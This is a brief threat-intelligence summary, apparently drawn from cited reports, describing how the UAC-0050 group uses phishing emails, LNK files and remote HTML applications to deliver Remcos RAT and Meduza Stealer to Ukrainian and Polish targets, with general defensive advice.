UAC-0050 [1] [2] [3] [4] [5] [6], a threat actor active since 2020 [2] [3] [4], is currently using phishing attacks to distribute the Remcos RAT malware [2] [3] [4] [5]. This group has a history of targeting Ukrainian and Polish entities through social engineering campaigns [2] [3] [4] [5], utilizing phishing emails that impersonate legitimate organizations [1].


In February 2023 [1] [3] [4], UAC-0050 launched a phishing campaign that delivered the Remcos RAT. This trojan has been distributed in multiple phishing waves [1] [2] [3] [4], including one that deployed an information stealer called Meduza Stealer [2] [3] [4]. The initial attack vector involves phishing emails disguised as job propositions for Ukrainian military personnel [6]. The attack utilizes an LNK file to collect information about antivirus products and execute an HTML application from a remote server [2] [3] [4]. This leads to the download of two files [3] [4], one of which establishes persistence and launches the Remcos RAT [3] [4]. The RAT is capable of harvesting system data and login information from web browsers [2] [3] [4]. UAC-0050 has demonstrated advanced adaptability in their operational methods, evading detection by EDR and antivirus systems through the integration of a pipe method for covert data transfer within the Windows operating system. This technique allows for the seamless movement of decrypted data between processes, marking a significant advancement in UAC-0050’s strategies [1].


The activities of UAC-0050 pose a significant threat to Ukrainian and Polish entities. It is crucial for organizations to remain vigilant against phishing attacks and implement robust security measures to mitigate the risk of malware infections. The integration of a pipe method for covert data transfer highlights the need for continuous improvement in cybersecurity defenses to stay ahead of evolving threat actors like UAC-0050.